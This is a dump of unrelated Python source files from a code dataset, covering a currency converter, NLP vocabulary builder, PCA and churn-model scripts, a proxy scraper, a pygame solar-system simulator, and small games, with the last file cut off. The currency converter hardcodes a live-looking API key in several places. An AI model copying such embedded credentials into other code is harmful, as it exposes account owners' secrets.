+{"seq_id":"606341398","text":"import requests, json, sys\nfrom tools.printer import print_msg, print_tool_name, get_input, clear_console\n\n# api_key=31120a6edf-52f0320c4e-qqu4cg\n\n\nall_codes = dict()\n\ndef get_amount():\n while True:\n try:\n return float(get_input(\"Enter Amount: \"))\n \n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\ndef get_all_codes(display=False):\n try:\n r_data = requests\\\n .get(\"https://api.fastforex.io/currencies?api_key=31120a6edf-52f0320c4e-qqu4cg\")\n\n return json.loads(r_data.content)['currencies']\n\n except requests.exceptions.ConnectionError:\n print_msg(\"error\", \"\\nUnable to Connect to Host! Please check your internet connection\\n\")\n exit()\n\ndef get_curr(payloads):\n try:\n response = requests\\\n .get(\"https://api.fastforex.io/fetch-one\", params=payloads)\n\n r_data = json.loads(response.content)\n\n if \"error\" in r_data:\n raise Exception(r_data['error'])\n\n return r_data\n\n except requests.exceptions.ConnectionError as e:\n print_msg(\"error\", e)\n return False\n\n except Exception as e:\n print_msg(\"error\", e)\n\ndef get_code(text):\n all_codes = get_all_codes()\n while True:\n try:\n code = get_input(text).upper()\n if code in all_codes:\n return code\n else:\n raise Exception(\"The Currency code --> {} does not exist\"\\\n .format(code))\n\n except KeyboardInterrupt:\n print_msg(\"warning\", \"\\nProgram Terminated!\\n\")\n exit()\n\n except Exception as e:\n print_msg(\"error\", e)\n continue\n\n\ndef convert():\n curr_from = get_code(\"Convert From: \")\n curr_to = get_code(\"Convert To: \")\n amount = get_amount()\n\n payloads = {\n \"from\":curr_from, \n \"to\": curr_to, \n \"api_key\":\"31120a6edf-52f0320c4e-qqu4cg\"\n }\n\n data = get_curr(payloads)\n if data != None:\n total = data['result'][curr_to] * amount\n print_msg(\"success\", \"\\n{}-{} ==> {}-{:.2f} \".format(\n curr_from, amount, curr_to, total\n ))\n\ndef converter():\n print_tool_name(\"Aboki $$\", \"Devvyhac\", \"Team Trace Techie\", \"github.com/devvyhac\")\n convert()\n\n","sub_path":"currency_converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"402528971","text":"# Vocabulary\nfrom __future__ import division, print_function\n\nimport util.io as io\nimport sys\nfrom collections import defaultdict, Counter\nimport string\nimport nltk\nimport numpy as np\n\nclass Vocab:\n\n def __init__(self, fn = None):\n\n self.D = defaultdict()\n self.idx2word = defaultdict()\n\n # Punctuations.\n self.punc = set(list(string.punctuation))\n # Special tokens.\n self.special_tokens = ['', '', '']\n\n if fn:\n self.load(fn)\n\n\n def save(self, fn):\n io.save_json(self.D, fn)\n\n def load(self, fn):\n d = io.load_json(fn)\n assert(isinstance(d, dict) and '' in d)\n\n self.D = defaultdict(lambda: d[''], d)\n idx2word = [(idx, w) for w, idx in self.D.iteritems()]\n self.idx2word = defaultdict(lambda: '', idx2word)\n\n def __getitem__(self, x):\n if isinstance(x, int):\n return self.idx2word[x]\n else:\n return self.D[unicode(x)]\n\n def __len__(self):\n return len(self.D)\n\n def build_from_corpus(self, corpus, max_size = 100000, min_num = 5):\n '''\n corpus: The textual corpus to build vocabulary from. The format is [string].\n\n max_size: max size of the vocabulary\n min_num: min appearance number of a word that will be included in the vocabulary\n '''\n\n print('[vocab.py] building from corpus')\n\n # filter_words is a list of words that are not wanted to be in the vocabulary\n filter_words = self.punc\n\n # build the vocabulary\n print('>>> tokenizing...')\n # corpus_token = [nltk.word_tokenize(unicode(sent).lower()) for sent in corpus]\n # words = sum(corpus_token, [])\n words = []\n n_sent = len(corpus)\n for i, sent in enumerate(corpus):\n words += nltk.word_tokenize(unicode(sent).lower())\n if i % 100 == 0:\n print('\\r %.2f%%' % (100*i/n_sent), end = '')\n sys.stdout.flush()\n print('')\n\n\n print('>>> counting...')\n word_counter = Counter(words).most_common()\n words_t = [w for (w, c) in word_counter if c >= min_num and w not in filter_words]\n words_t = words_t[0:max_size]\n words_t = self.special_tokens + words_t\n\n print('>>> building dictionary')\n self.D = defaultdict(lambda: words_t.index(''), zip(words_t, range(len(words_t))))\n self.idx2word = defaultdict(lambda: '', zip(range(len(words_t)), words_t))\n\n def encode(self, sent, seq_length = None, decorate = True):\n '''\n Encode sentence(str) into index_seq([int])\n '''\n\n seq = [self.D[w] for w in nltk.word_tokenize(unicode(sent).lower()) if w not in self.punc]\n\n if decorate:\n seq = [self.D['']] + seq + [self.D['']]\n\n if seq_length:\n if len(seq) > seq_length:\n seq = seq[0:seq_length]\n else:\n seq += [self.D['']] * (seq_length - len(seq))\n\n return seq\n\n def decode(self, seq):\n '''\n Decode sentence(str) from seq([word_index])\n '''\n tokens = []\n for idx in seq:\n w = self.idx2word[idx]\n if w == '':\n continue\n elif w == '':\n break\n else:\n tokens.append(w)\n return ' '.join(tokens)\n\n\n def encode_batch(self, sents, seq_length):\n '''\n Encode a batch of sentences. The sequecnes will be truncated to the same size\n '''\n\n seqs = [self.encode(sent, seq_length + 1, decorate = True) for sent in sents]\n\n seqs_input = [seq[0:seq_length] for seq in seqs]\n seqs_target = [seq[1::] for seq in seqs]\n \n # mask where is 0 and other token is 1\n v = np.where(np.array(seqs_target) == self.D[''], 0, 1) \n seq_mask = np.where(v[:,::-1].cumsum(1)[:,::-1] > 0, 1, 0).tolist()\n\n return seqs_input, seqs_target, seq_mask\n","sub_path":"modules/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"273565905","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 24 13:51:14 2017\r\n\r\n@author: hyungu\r\n\"\"\"\r\n\r\n# Import modules\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\nsns.set_style('whitegrid')\r\n\r\n\r\n# Import data\r\ndata = pd.read_csv(\"./0_Data/BreastCancerWisconsin.csv\")\r\nprint(\"- Data has {} rows and {} columns.\".format(*data.shape))\r\nprint(\"- Column names: \", list(data.columns))\r\n\r\n\r\n# Split dataset into X and y\r\nX = data.drop(['diagnosis'], axis=1)\r\nX = X.iloc[:, :10]\r\ny = data['diagnosis']\r\n\r\n\r\n# Standardize data onto unit scale (mean=0 and variance=1)\r\nX = StandardScaler().fit_transform(X)\r\n\r\n\r\n# Perform PCA\r\npca = PCA(n_components=None)\r\nZ = pca.fit_transform(X)\r\nprint(\"- Shape of transformed data: \", Z.shape)\r\n\r\n\r\n# Explained variance ratio of principal components\r\nnum_components = pca.n_components_\r\nexp_var = pca.explained_variance_ratio_\r\ncum_exp_var = np.cumsum(exp_var)\r\n\r\n\r\n# Plot explained variance ratio and cumulative sums\r\nplt.figure(num=1, figsize=(7, 7))\r\nplt.bar(range(num_components), exp_var, alpha=0.5, label='individual explained variance')\r\nplt.step(range(num_components), cum_exp_var, label='cumulative explained variance')\r\nplt.xlabel('Principal components')\r\nplt.ylabel('Explained variance ratio')\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\n\r\n# Plot the transformed data (Z) with 2 PCs\r\nplt.figure(num=2, figsize=(7, 7))\r\nfor label, color, marker in zip(('B', 'M'), ('blue', 'red'), ('o', '^')):\r\n plt.scatter(Z[y == label, 0], Z[y == label, 1],\r\n label=label, color=color, marker=marker, alpha=0.5)\r\nplt.xlabel('Principal Component 1')\r\nplt.ylabel('Principal Component 2')\r\nplt.legend(loc='best')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n\r\n# Plot the transformed data (Z) with 3 PCs\r\nfig = plt.figure(num=3, figsize=(7, 7))\r\nax = fig.add_subplot(111, projection='3d')\r\nfor label, color, marker in zip(('B', 'M'), ('blue', 'red'), ('o', '^')):\r\n ax.scatter(Z[y == label, 0], Z[y == label, 1], Z[y == label, 2],\r\n label=label, color=color, marker=marker, alpha=0.5)\r\nax.set_xlabel('Principal Component 1')\r\nax.set_ylabel('Principal Component 2')\r\nax.set_zlabel('Principal Component 3')\r\nax.legend(loc='best')\r\nplt.show(fig)\r\n","sub_path":"sklearn_2017/1일차_실습자료/5_PCA/PrincipalComponentAnalysis.py","file_name":"PrincipalComponentAnalysis.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"478763100","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport re\nimport logging\n\nimport os\nimport sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom agent import Agent\nfrom util.webRequest import WebRequest\n\nlogger = logging.getLogger(__name__)\n\n\n@Agent.register\nclass FreeProxy(Agent):\n def __init__(self):\n self.url = 'https://free-proxy-list.net/'\n self.re_ip_port_pattern = re.compile(\n r\"(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) (\\d{1,5}) \", re.I)\n\n def extract_proxy(self, page_num=0):\n try:\n rp = WebRequest().get(self.url.format(page=page_num), timeout=10)\n re_ip_port_result = self.re_ip_port_pattern.findall(rp.text)\n for host, port in re_ip_port_result:\n yield f'{host}:{port}'\n\n except:\n pass\n\n\nif __name__ == '__main__':\n p = Agent.proxies[0]()\n for proxy in p.extract_proxy():\n print(proxy)\n","sub_path":"agent/free_proxy.py","file_name":"free_proxy.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"393891435","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 14 21:24:48 2020\n\n@author: encry973r\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n# import dataset\ndata = pd.read_csv('Churn_Modelling.csv')\n\n# matrix of features and dependent variable\nX = data.iloc[:, 3:13].values\ny = data.iloc[:, 13].values\n\n# convert country column to dummies\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\n# ct for the country dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder', \n OneHotEncoder(categories='auto'),\n [1])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# ct for the gender dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder',\n OneHotEncoder(categories='auto'),\n [3])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# split dataset into train and test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=0)\n\n# feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# copies for reference\nX_train2 = X_train.copy()\nX_test2 = X_test.copy()\n\n# dimensional reduction : PCA , n_components = 6 ; gave 62.81%\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=6)\nX_train = pca.fit_transform(X_train)\nX_test = pca.transform(X_test)\nexplained_variance_ratio = pca.explained_variance_ratio_\n\n# build ANN\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nclassifier = Sequential()\n# add input and first hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu', input_dim=6))\n# add second hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu'))\n# add out put layer\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n# fit ANN to train dataset\nclassifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Build ANN architecture\n# import keras\n# from keras.models import Sequential\n# from keras.layers import Dense\n\n# initialize the classifier\n# classifier = Sequential()\n\n# accuracy\n# units = 6, accuracy = 83.41%\n# units = 11, accuracy = 86.68%\n\n# add input and first hidden\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu', input_dim=11))\n# # add second hidden layer\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu'))\n# # output layer\n# classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n# # compile network\n# classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# # fit data to classifier\n# classifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n# y_pred = (y_pred > 0.5)\n\n# decision tree classifier\n# 80.25% accuracy\n# from sklearn.tree import DecisionTreeClassifier\n# classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# Random Forest Classifier\n# 86.85% accuracy\n# from sklearn.ensemble import RandomForestClassifier\n# classifier = RandomForestClassifier(n_estimators=300, criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kernel svm\n# 86.85% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='rbf', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# poly svm\n# 85.7% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='poly', degree=3, random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kmeans\n# 82.95% accuracy\n# from sklearn.naive_bayes import GaussianNB\n# classifier = GaussianNB()\n# classifier.fit(X_train, y_train)\n\n# KNN\n# 82.7% accuracy\n# from sklearn.neighbors import KNeighborsClassifier\n# classifier = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)\n# classifier.fit(X_train, y_train)\n\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n\n\n# show confusion matrix\nfrom sklearn.metrics import confusion_matrix \ncm = confusion_matrix(y_test, y_pred) \n\n# truth = ((cm[0, 0] + cm[1, 1])/cm.sum())*100\n\n# print(str(truth) + '%')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"7DeepLearning/ANN/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"64924197","text":"### Joseph Rice 10/2/2017\r\n##\r\n##### Plan for this code down below\r\n##\"\"\" 1. Set the background up for the target\r\n## 2. Get the circles asighned to spasific points trough mouse clicks\r\n## 3. Get the sum of the scores computed on the graphic window\r\n##\r\n## \"\"\" \r\n##\r\n##\r\n##\r\n##\r\n\r\n\r\nmaxX=minY = 10\r\nmaxY=minX = -10\r\n\r\nfrom graphics import *\r\n\"\"\" THIS SETS THE GRAPH WIN UP \"\"\" \r\nfrom math import pi as PIE\r\nfrom math import sqrt\r\nwin = GraphWin(\"Archer Target\", 600,600)\r\nwin.setCoords(minX,minY,maxX,maxY)\r\nwin.setBackground(\"green\")\r\n\r\n## CODE FOR CIRCLES \r\ncenter = Point(0,0)\r\nc_white = Circle(center,5)\r\nc_white.setFill(\"white\")\r\nc_white.draw(win)\r\n\r\nc_black = Circle(center,4)\r\nc_black.setFill(\"purple\")\r\nc_black.draw(win)\r\n\r\ncblue = Circle(center,3)\r\ncblue.setFill(\"Blue\")\r\ncblue.draw(win)\r\n\r\nc_red = Circle(center,2)\r\nc_red.setFill(\"red\")\r\nc_red.draw(win)\r\n \r\nc_yellow = Circle(center, 1)\r\nc_yellow.setFill(\"yellow\")\r\nc_yellow.draw(win)\r\n\r\nTotal_score = Text(Point(0,-9),\"NO RULES!!!!!!!!!!\")\r\n\r\nTotal_score.draw(win)\r\nmessage = Text(Point(0,6), \"Click To Shot Arrow\")\r\nmessage.setStyle(\"bold\")\r\nmessage.draw(win)\r\n\r\n## list for storage \r\ntotal_score = []\r\n\r\n## TEST CODE \r\nTry_1 = win.getMouse()\r\nend_of_arrow = Point(-2,4)\r\n## function for the calulation of radius\r\ndef radus(x,y):\r\n r = sqrt(x**2 + y**2)\r\n return r \r\n## TEST FUNCTION CODE\r\n##value = radus(3,4) \r\n##print(value)\r\n\r\n### function for the logic gate.\r\ndef score(r):\r\n if r <=1:\r\n value = 9\r\n elif r <=2:\r\n value = 7 \r\n elif r <=3:\r\n \r\n value = 5\r\n elif r <=4:\r\n \r\n value = 3\r\n elif r <=5:\r\n \r\n value = 2\r\n else:\r\n \r\n value = 0\r\n return value\r\n\r\nr = radus(Try_1.getX(),Try_1.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New = str(value) + \" Points!\"\r\nTotal_score.setText(message_New)\r\n\r\n## \r\nline = Circle(Point(Try_1.getX(),Try_1.getY()),0.1)\r\nline.setFill(\"black\")\r\nline.draw(win)\r\n\r\nTry_2 = win.getMouse()\r\nr = radus(Try_2.getX(),Try_2.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New2 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New2)\r\n\r\ncir = Circle(Point(Try_2.getX(),Try_2.getY()),0.1)\r\ncir.setFill(\"black\")\r\ncir.draw(win)\r\n\r\nTry_3 = win.getMouse()\r\nr = radus(Try_3.getX(),Try_3.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New3 = str(value) + ' Points !'\r\nTotal_score.setText(message_New3)\r\n\r\ncir_3 = Circle(Point(Try_3.getX(),Try_2.getY()),0.1)\r\ncir_3.setFill(\"black\")\r\ncir_3.draw(win)\r\n\r\nTry_4 = win.getMouse()\r\nr = radus(Try_4.getX(),Try_4.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New4 = str(value) + ' Points !'\r\nTotal_score.setText(message_New4)\r\n\r\ncir_4 = Circle(Point(Try_4.getX(),Try_4.getY()),0.1)\r\ncir_4.setFill(\"black\")\r\ncir_4.draw(win)\r\n\r\nTry_5 = win.getMouse()\r\nr = radus(Try_5.getX(),Try_5.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New5 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New5)\r\n\r\ncir_5 = Circle(Point(Try_5.getX(),Try_5.getY()),0.1)\r\ncir_5.setFill(\"black\")\r\ncir_5.draw(win)\r\n\r\nmessage.setText(\"click to see total\")\r\nwin.getMouse()\r\naddition = 0\r\n\r\n\r\nfor i in total_score:\r\n number_value = int(i)\r\n addition = number_value + addition\r\n\r\nmessage.setText(\"Your final score is:{0:7}\".format(addition))\r\n\r\nwin.getMouse()\r\n\r\nwin.close()\r\n\r\n","sub_path":"Archer_Target.py","file_name":"Archer_Target.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"382668868","text":"def seperate(numbers, threshold):\n thresholdAndOver = []\n thresholdUnder = []\n for i in range(len(numbers)):\n if numbers[i] >= threshold: thresholdAndOver.append(numbers[i])\n else: thresholdUnder.append(numbers[i])\n return thresholdAndOver,thresholdUnder\n\n\na = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nover,under = seperate(a,5)\n\nprint(over,under)\n\n\ndef multiplication_table(n):\n a=[]\n for i in range(1,n+1):\n for j in range(1,n+1):\n mul = i * j\n a.append(mul)\n print(a)\n for k in range(1,n+1):\n a.pop()\n return a\n\nprint(multiplication_table(4))","sub_path":"øvinger 7/gangetabell og lister.py","file_name":"gangetabell og lister.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"282426430","text":"from django.db import models\nfrom django.conf import settings\nfrom event.models import Event\n\n\n# Create your models here.\n\n\nclass Order(models.Model):\n\tuser = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n\tevent = models.ForeignKey(Event, on_delete=models.CASCADE)\n\tprice = models.BigIntegerField('event price', default=0)\n\tdate = models.DateTimeField(auto_now=True)\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} buy {self.event.title_event}'","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"311574549","text":"import numpy as np\n\n\nclass SixSigma ():\n\n '''Implementation of SixSigma method for anomaly detection.\n Six Sigma uses three standard deviations below the mean and three standard deviations\n above the mean to predict anomalies.\n\n Attributes:\n time_window : type int (default = 2)\n 'window size -> number of samples used for calculating the mean and standard deviation'\n\n Example shown in test_six_sigma.py\n '''\n\n\n def __init__(self,time_window=2):\n\n self.time_window = time_window\n self.buffer = []\n\n\n def fit (self,X,y):\n\n '''fit the model. Adjust buffer to obtain only the last time_window number of samples'''\n\n self.buffer.append(X)\n self.buffer = self.buffer[-self.time_window:]\n\n def predict (self,X):\n\n '''predict class for passed data. '''\n\n if len(self.buffer) < self.time_window:\n return None\n else:\n j = 0\n while j < len(X):\n i = 0\n feature_array =[]\n while i < len(self.buffer):\n feature_array.append(self.buffer[i][j])\n i += 1\n average = np.mean(feature_array)\n sigma = np.std(feature_array)\n prediction = int(abs(X[j]) > abs(average) + 3 * abs(sigma))\n if prediction == 1:\n break\n j+=1\n return prediction\n\n","sub_path":"src/skmultiflow/anomaly_detection/six_sigma.py","file_name":"six_sigma.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"41267989","text":"import logging\nimport dtlpy as dl\nfrom importlib import import_module\nfrom plugin_utils import maybe_download_data\nlogger = logging.getLogger(__name__)\n\n\nclass PluginRunner(dl.BasePluginRunner):\n \"\"\"\n Plugin runner class\n\n \"\"\"\n\n def __init__(self, plugin_name):\n self.plugin_name = plugin_name\n pass\n\n def run(self, dataset, model_specs, hp_values, configs=None, progress=None):\n\n maybe_download_data(dataset)\n\n # get project\n # project = dataset.project\n # assert isinstance(project, dl.entities.Project)\n\n # start tune\n cls = getattr(import_module('.adapter', 'zoo.' + model_specs['name']), 'AdapterModel')\n\n final = 1 if self.plugin_name == 'trainer' else 0\n devices = {'gpu_index': 0}\n\n adapter = cls(devices, model_specs, hp_values, final)\n if hasattr(adapter, 'reformat'):\n adapter.reformat()\n if hasattr(adapter, 'data_loader'):\n adapter.data_loader()\n if hasattr(adapter, 'preprocess'):\n adapter.preprocess()\n if hasattr(adapter, 'build'):\n adapter.build()\n adapter.train()\n\n if final:\n return adapter.get_checkpoint()\n else:\n metrics = adapter.get_metrics()\n if type(metrics) is not dict:\n raise Exception('adapter, get_metrics method must return dict object')\n if type(metrics['val_accuracy']) is not float:\n raise Exception(\n 'adapter, get_metrics method must return dict with only python floats. '\n 'Not numpy floats or any other objects like that')\n return metrics\n\n # pipeline_id = str(uuid.uuid1())\n # local_path = os.path.join(os.getcwd(), pipeline_id)\n #\n # #####################\n # # upload for resume #\n # #####################\n # project.artifacts.upload(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)\n #\n # #######################\n # # download for resume #\n # #######################\n # project.artifacts.download(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"304848463","text":"from Planet import *\nfrom Spaceship import *\nfrom Frame import *\nfrom Maths import *\nimport time\n\nframe = Frame()\n\nobjects = []\n\nsoleil = Planet(None, \"Soleil\", 1.99e30, 1.39e6, 0, 0)\nsoleil.x = frame.frame.winfo_screenwidth()/2\nsoleil.y = frame.frame.winfo_screenheight()/2\n\nmercure = Planet(soleil, \"Mercure\", 3.29e23, 4.88e3, 5.79e7, 308)\nvenus = Planet(soleil, \"Venus\", 4.87e24, 1.21e4, 1.08e8, 168)\nterre = Planet(soleil, \"Terre\", 5.97e24, 1.27e4, 1.49e8, 175)\nlune = Planet(terre, \"Lune\", 7.35e22, 3.47e3, 3.84e5, 113.8)\nmars = Planet(soleil, \"Mars\", 6.42e23, 6.78e3, 2.27e8, 313)\njupiter = Planet(soleil, \"Jupiter\", 1.90e27, 1.40e5, 7.79e8, 309) \nsaturne = Planet(soleil, \"Saturne\", 5.68e26, 1.16e5, 1.42e9, 168)\nuranus = Planet(soleil, \"Uranus\", 8.68e25, 5.07e4, 2.88e9, 353)\nneptune = Planet(soleil, \"Neptune\", 1.02e26, 4.92e4, 4.50e9, 324)\n\nvaisseau = Spaceship(300, 300)\n\nobjects.append(soleil)\nobjects.append(mercure)\nobjects.append(venus)\nobjects.append(terre)\nobjects.append(lune)\nobjects.append(mars)\nobjects.append(jupiter)\nobjects.append(saturne)\nobjects.append(uranus)\nobjects.append(neptune)\nobjects.append(vaisseau)\n\n##Boucle principale\nFPS=60\nsleepTime = 1/FPS\nelapsed = 0 #Temps écoulé\nstartloop = time.time() \n\ndef upPos():\n if vaisseau.x < vaisseau.photo.width()/2:\n setSpeedScrollX(-vaisseau.speedX)\n elif vaisseau.x > frame.frameW - vaisseau.photo.width():\n setSpeedScrollX(-vaisseau.speedX)\n else:\n setSpeedScrollX(0)\n\n if vaisseau.y < vaisseau.photo.height()/2:\n setSpeedScrollY(-vaisseau.speedY)\n elif vaisseau.y > frame.frameH + vaisseau.photo.height():\n setSpeedScrollY(-vaisseau.speedY)\n else:\n setSpeedScrollY(0)\n \nwhile True:\n #Le temps qu'il s'est écoulé depuis le dernier tour de boucle\n delta = time.time()-startloop\n startloop = time.time()\n \n increaseTime=frame.time.get()*2.628e6 #Convertie les mois en secondes\n frame.univers.delete('all')\n \n #Parcours tous les objets, les actualise et les affiche\n for i in range(len(objects)):\n obj = objects[i]\n obj.move(delta*increaseTime)\n frame.draw(obj)\n frame.setInfos(round(vaisseau.x), round(vaisseau.y), elapsed)\n \n TRC = PFD(vaisseau, objects, soleil)\n #On convertie le TRC qui est en mètre en km\n vaisseau.accelX = convertDist(TRC[0]*10**-3)\n vaisseau.accelY = convertDist(TRC[1]*10**-3)\n \n upPos()\n \n #Si l'utilisateur a cliqué affiche les infos de la planète\n if getClicked():\n infoPlanet = getInfoPlanet(getPlanetClicked(objects, getMousePos()))\n #S'il n'a pas cliqué en dehors d'une planète \n if infoPlanet != None:\n frame.createPopup(infoPlanet)\n setClicked(False)\n \n frame.frame.update()\n time.sleep(sleepTime)\n elapsed += delta*increaseTime\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"355930040","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.dont_write_bytecode = True\ndef cmp_dict(src_data,dst_data):\n # 比较两个字典是否完全一致,若一致返回True\n flag = True\n if not (type(src_data) == type(dst_data)):\n flag = False\n else:\n if isinstance(src_data,dict):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for key in src_data:\n if not dst_data.has_key(key):\n flag = False\n break\n else:\n flag = (flag and cmp_dict(src_data[key],dst_data[key]))\n\n elif isinstance(src_data,list):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for src_list, dst_list in zip(sorted(src_data), sorted(dst_data)):\n flag = (flag and cmp_dict(src_list, dst_list))\n if not flag:\n break\n else:\n if not (src_data == dst_data):\n flag = False\n return flag\n\ndef get_diff_keys(cover_keys,cmp_dict,current_dict):\n # 不同模型参数比较,参数相同的键放入same_keys中,不同的放入diff_keys,便于csv文件中参数顺序的排列\n cmp_keys = cmp_dict.keys()\n current_keys = current_dict.keys()\n diff_keys = []\n same_keys = []\n for key in cover_keys:\n if (key in cmp_keys) and (key in current_keys):\n if cmp_dict[key] == current_dict[key]:\n same_keys.append(key)\n else:\n diff_keys.append(key)\n else:\n diff_keys.append(key)\n return diff_keys,same_keys","sub_path":"remodet_repository_wdh_part/Projects/PyLib/Utils/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"196153343","text":"# Name : Gobang game \n# Author : simon \n# e-mail : 2441873702@qq.com\n# Date : 2020.05.27 19:02\n# version: v3\n# http://www.pyinstaller.org/downloads.html\n# http://www.ico51.cn/ \n# bug 1 : 当鼠标点击到画布棋盘外仍可显示棋子 ———— fixed\n# bug 2 : 棋子会覆盖之前已经绘制的位置 ———— fixed\n# bug 3 : 棋子数量达到一定时,不会判定结果\n\n\nimport pygame\nimport pygame.freetype\n\n\n# fps setting\nfps = 300\n\n# default str value\nsize = width, height = 800, 600\nborder = 50 \nwlc_str = \"Welcom to gobang game!\"\nsuccessor = \"\"\n\n# default color\nbg_color = (128,138,135)\t#pygame.Color(\"white\")\nline_color = 0,0,0\n\n# chess color\nWHITE = 255,255,255\nBLACK = 0,0,0\nfont_color = 0,0,0\n\npygame.init()\nfclock = pygame.time.Clock()\n# pygame Surface\nscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\nbackground = pygame.Surface(screen.get_size())\ncaption = \"Gobang Game\"\npygame.display.set_caption(caption)\nicon = pygame.image.load('gobang_logo.png')\npygame.display.set_icon(icon)\n\n\ndef draw_font(background, string='Hello 